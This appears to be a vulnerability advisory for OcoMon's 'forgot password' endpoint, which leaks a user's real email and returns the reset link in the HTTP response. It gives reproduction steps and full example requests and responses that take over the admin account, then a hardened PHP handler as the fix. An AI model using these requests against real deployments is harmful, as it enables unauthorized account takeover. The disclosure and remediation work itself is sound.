Through the password recovery flow it is possible to obtain a token to reset the password of any user.
The vulnerability occurs because the application validates the username and email against the database and returns the user's real email address in the response.
If the username and email are valid, the application returns the password reset link directly to the requester in the response instead of sending it only by email.
- Access "Esqueci minha senha" (Forgot my password).
- Enter a valid username (example: admin) and a fake email.
- The user's real email is exposed in the response (field `mail_to`).
- Send the request again, replacing the fake email with the user's real email.
- The response contains the link to change the user's password (field `forget_link`); just access it and set a new password.
Examples:

Request 1 (valid username, fake email):
URL: https://ocomon.site/includes/common/require_access_recovery_process.php
DATA: csrf=qgBhHao%2BUlza4vm2VFTQZYs7V8A%3D&csrf_session_key=csrf_token&login_name=admin&email=anything@email.com&action=require_recovery
RESPONSE: {"action":"require_recovery","field_id":"email","login_name":"admin","email":"anything@email.com","user_id":"1","name":"Administrador do Sistema","mail_to":"realemail@email.com"}

Request 2 (valid username, real email taken from `mail_to`):
URL: https://ocomon.site/includes/common/require_access_recovery_process.php
DATA: csrf=qgBhHao%2BUlza4vm2VFTQZYs7V8A%3D&csrf_session_key=csrf_token&login_name=admin&email=realemail@email.com&action=require_recovery
RESPONSE: {"action":"require_recovery","field_id":"","login_name":"admin","email":"realemail@email.com","user_id":"1","name":"Administrador do Sistema","mail_to":"realemail@email.com","rand":"b39abfbd697e566d178e678462b0b6c1","forget_link":"https:\/\/ocomon.site\/setNewPass.php?code=1|b39abfbd697e566d178e678462b0b6c1"}
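The responses above leak three things a recovery endpoint must never return: the stored address (`mail_to`), which field failed to match (`field_id`, so accounts can be enumerated), and the reset link itself. The handler below is an added illustration of the fix, not OcoMon's code; `find_user_by_login`, `store_reset_token` and `send_mail` are hypothetical callbacks standing in for the application's database and mailer, and it assumes `setNewPass.php` looks the token up by its stored hash.

```php
<?php
// Hardened "require_recovery" handler (example, not the project's code).
// The same generic body is returned on every path, so the response reveals
// neither whether the login exists, nor the stored e-mail, nor the token.
declare(strict_types=1);

function generic_response(): array
{
    return [
        'action'  => 'require_recovery',
        'message' => 'If the account exists, a reset link has been sent to its e-mail address.',
    ];
}

function handle_require_recovery(
    array $post,
    callable $find_user_by_login,   // hypothetical: login_name -> ['id' => int, 'email' => string] | null
    callable $store_reset_token,    // hypothetical: (user_id, token_hash, expires_at) -> void
    callable $send_mail             // hypothetical: (to, subject, body) -> void
): array {
    $login = trim((string) ($post['login_name'] ?? ''));
    $email = trim((string) ($post['email'] ?? ''));
    if ($login === '' || $email === '') {
        return generic_response();
    }

    $user = $find_user_by_login($login);
    // Mismatch or unknown login: do not echo the stored address and do not
    // report which field failed (no "field_id":"email" hint).
    if ($user === null || strcasecmp($user['email'], $email) !== 0) {
        return generic_response();
    }

    // 256-bit token from a CSPRNG; only its hash is persisted so a database
    // read does not yield a usable link. The token is single-use and short-lived.
    $code = bin2hex(random_bytes(32));
    $store_reset_token((int) $user['id'], hash('sha256', $code), time() + 30 * 60);

    // The link is delivered only to the address on record, never in the HTTP body.
    $link = 'https://ocomon.site/setNewPass.php?code=' . rawurlencode($code);
    $send_mail($user['email'], 'Password reset', "Use this link within 30 minutes: $link");

    return generic_response();
}
```

With this shape, request 1 and request 2 from the examples above produce byte-identical responses, and the only way to obtain the link is to control the mailbox on record.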